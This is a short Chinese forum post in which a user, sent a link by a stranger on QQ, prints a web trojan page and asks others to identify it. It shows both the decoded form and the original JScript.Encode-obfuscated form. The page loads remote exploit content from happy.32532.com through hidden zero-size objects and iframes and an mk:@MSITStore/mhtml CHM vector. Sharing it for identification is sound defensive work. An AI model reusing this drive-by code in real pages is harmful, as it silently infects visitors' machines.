大家看看这个是什么网页木马。今天在qq上一个陌生人发我的。。
我把代码解密了如下:
==============================================
<TITLE>请稍等 正在选择最快的服务器</title>
<meta http-equiv="refresh" content="4;URL=http://www.tingyue.net">
<script language = JScript>
{
document.write('<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c:\.mht!
http://happy.32532.com/zm/um.chm::/%23.htm"></OBJECT>');
}
</SCRIPT>
<SCRIPT language=JScript>
{
document.write('<object data="
http://happy.32532.com/98.asp" width=0 height=0></object>');}</SCRIPT>
<SCRIPT language=JScript>
{
document.write('<iframe name=I1 height=0 width=0 scrolling=no align=middle border=0 frameborder=0 src=http://happy.32532.com/afu.htm></iframe>');}</SCRIPT>
<SCRIPT language=JScript>function sopen(){try{window.showModelessDialog("
http://happy.32532.com/66.htm","","status:no;scroll:no;dialogHeight:100px;dialogWidth:100px;dialogTop:2000px;dialogLeft:2000px;help:no;");self.focus();}catch(e){}}
ie=navigator.appVersion;
if(ie.indexOf("MSIE 5.0")==-1 &&
ie.indexOf("NT 5.2")==-1&&
!(ie.indexOf("NT 5.1")!=-1&&navigator.appMinorVersion.indexOf("SP2")!=-1)
){setTimeout('sopen();',0);}else{
document.write('');}</SCRIPT>
<script language=JScript>
function b2()
{
document.write('<iframe name=I1 height=0 width=0 scrolling=no align=middle border=0 frameborder=0 src=http://vearmusic.com></iframe>')
};
setTimeout("b2()",15000)
</script>
==================================================
好像不是help的漏洞。。原代码如下:
==============
<TITLE>请稍等 正在选择最快的服务器</title>
<meta http-equiv="refresh" content="4;URL=http://www.tingyue.net">
<script language = JScript.Encode>#@~^yAAAAA==@#@& @#@&NKmEs+ ORSDrY`v@!}A9A/K,k9O4'ZP_+ro4O{!~/DzV'E[b/wsCH)UW npJ~DXa+'rYaYJ6R/1Dr2DV+DEP9lYmxE:0)@$HjqPjDW.+=htD:sl1)- h4YZtDOa)&JtmwwHR2+*2 mK:&"szEs m4:)=&Y 2R4YhJ@*@!Jr$9A/K@*BbI@#@&8@#@&8DsAAA==^#~@</SCRIPT>
<SCRIPT language=JScript.Encode>#@~^aAAAAA==@#@& @#@&NKmEs+ ORSDrY`v@!K4L^Y,NlDCxJ4YDwlz&4mw2Xcf l&+ 1W:&1RRC/aE,hr9Y4'!,tro4Yx!@*@!&G(L+1O@*E#i)3R4AAA==^#~@</SCRIPT>
<SCRIPT language=JScript.Encode>#@~^nwAAAA==@#@& @#@&NKmEs+ ORSDrY`v@!b0Dmh+,xlsnxq8P4+ro4O{!~hb[Y4'T~kmDGs^kUo{UKPC^kTx'sk9[VP8WMNn.{!P6.ls+4K.[+M'ZPdD^x4YOw=&z4l22HR&+X2 mKhJlW!R4Y:@*@!Jr0Mlh+@*BbI)iDMAAA==^#~@</SCRIPT>
<SCRIPT language=JScript.Encode>#@~^uwEAAA==W!x^DkKxPkWanxv#`YMX`AbxNKARktWS\GNV/dfrC^WL`r4YDwl&Jtl22HRf lfyR^K:JvvctDhJBJE~r/OCDE/=UWp/mMGsV=xKi[kCsKou+bLtD)qTZw6I[blsWT bNO4)8!!a6p[kmVGo:W2ly!!Z26pNkmsGod+6Yl TTZwai4nVa)UGpJ#IdVWR6G1Edv#p8mmY14`#`8)@#@&r'xm-kTlYK. lawj+./rG i@#@&bW`b+ r N+a66`EHU(APXc!r#'{O8~[L@#@&kRrU9+6}W`r1K,X r#{'RF''@#@&Z`bnRbx[nXr0cEgK~*cqr#Z{O8[[ l7romYGDcl22tkxK..D/bGURbx9+arWcr?K rb"{Oqb@#@&#`dYPksnKEOvBkWwxvbiE~T#p8nsk+ @#@&NKmEsnUYchMkO+cvE#I8UYwAAA==^#~@</SCRIPT>
<script language=JScript.Encode>#@~^ygAAAA==@#@&0; mDkW P(+`*@#@& @#@&[G1E:UYchDbOn`E@!b0.lhn,xC:xq8P4nbotOxZPAk9O4'T,/1DW^VbUo{xGPmVrL ':b[N^+P(G.ND{!~0.Cs+8WM[+M'T~kDmx4DY2)J&7+CM:!/k1R1G:@*@!&k6DCh@*B*@#@&)i@#@&dnY:ks+GEOcr4+`*E~8*TTZ#@#@&vDwAAA==^#~@</script>
===========================================
大家看看。。。。。。。。。